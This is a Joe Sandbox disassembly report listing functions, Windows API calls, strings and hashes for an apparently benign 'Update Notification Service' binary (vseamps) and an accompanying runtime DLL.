Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

Jul 5 2019, xrefs: 0000000140001216
Help, xrefs: 0000000140001238
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
10:52:57, xrefs: 000000014000120F

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE1A5195BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A5195CB
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519601
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51962E
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51963F
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519650
SetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51966B

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 294ecd9cbcfe1625919d203323795a2e890604e5968f0c1276960b53027c7311
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: F1115C24B0CE4286FA546363559117921639F46FF0F8447F7E83E866F6DE2CA4418210

Function 00007FFE1A51E3F4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE1A51E473
WriteFile.KERNEL32 ref: 00007FFE1A51E73B
WriteFile.KERNEL32 ref: 00007FFE1A51E781
GetLastError.KERNEL32 ref: 00007FFE1A51E837

Strings

Rcl^i, xrefs: 00007FFE1A51E419

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID: Rcl^i
API String ID: 2718003287-2241636769
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: c3bdf5fc096c64068d07cd8c26a0ffa865e01ceaee71b160340412b538af1c01
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: DDD1D072B0CA8199E711CF66D4402FC37B2FB45BA8B4442B6DE9D97BA9DE38D446C340

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 00007FFE1A515448 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE1A5154B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A515503

Strings

Rcl^i, xrefs: 00007FFE1A515461
MOC, xrefs: 00007FFE1A5154CC
RCC, xrefs: 00007FFE1A5154D4

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$Rcl^i$RCC
API String ID: 3544855599-1328634003
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: 9ea521ba9b9547fd75e1f6027c28664a4c332a7af49d2ff03a5552e07416e182
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 43919F73B08B818AE750CB76D4802BD7BA1FB46BA8F1441BAEA4D17B65DF38D195C700

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE1A512218 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE1A512244
GetCurrentThreadId.KERNEL32 ref: 00007FFE1A512252
GetCurrentProcessId.KERNEL32 ref: 00007FFE1A51225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE1A51226E

Strings

Rcl^i, xrefs: 00007FFE1A512225

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID: Rcl^i
API String ID: 2933794660-2241636769
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 99074bbcaeb6ee96d02f745326b2312403cfb503c9c3e2833dcdd3fb923fde4c
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 53111C26B18F018AEB008BA1E8556B833A5F75AB68F440A72DA6D467B4EF7CD159C340

Function 00007FFE1A517F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE1A517F4D
GetProcAddress.KERNEL32 ref: 00007FFE1A517F63
FreeLibrary.KERNEL32 ref: 00007FFE1A517F8A

Strings

CorExitProcess, xrefs: 00007FFE1A517F5C
mscoree.dll, xrefs: 00007FFE1A517F44

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: cc6e9927e9ae361ad265774bd4d681b0ad353e873e8847fb938c48f3df052600
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 05F0446571DE06C1EB104B65A44477A6322AF46FB1F5402F7D55D451F4DF3CD045C740

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

mscoree.dll, xrefs: 0000000140008518
CorExitProcess, xrefs: 000000014000852A

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE1A5140D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE1A5141F7
__AdjustPointer.LIBCMT ref: 00007FFE1A514242

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: dfa8a47e8e8d099b9f3685c968c8f572eaa1b06f84ebfce588191cde8389bf3a
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: C9B1A1A5B0EE4281EA65DB53D04023D6BA2AF56FA4F0994F7DA5D077A6DF2CE4818300

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

